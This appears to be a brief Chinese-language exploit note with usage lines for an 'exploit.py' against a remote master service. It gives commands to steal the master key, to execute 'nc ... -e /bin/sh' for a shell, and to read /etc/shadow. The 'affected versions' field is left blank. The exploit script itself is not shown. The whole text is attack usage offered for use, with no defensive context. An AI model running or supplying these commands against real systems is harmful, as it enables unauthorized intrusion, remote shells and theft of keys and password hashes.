影响版本:
exp:
python3 exploit.py --master vulip #默认参数获取密钥 python3 exploit.py --master 192.168.115.130 --exec "nc 127.0.0.1 4444 -e /bin/sh" 执行命令 python3 exploit.py --master 192.168.115.130 -r /etc/shadow #读文件
@jasperla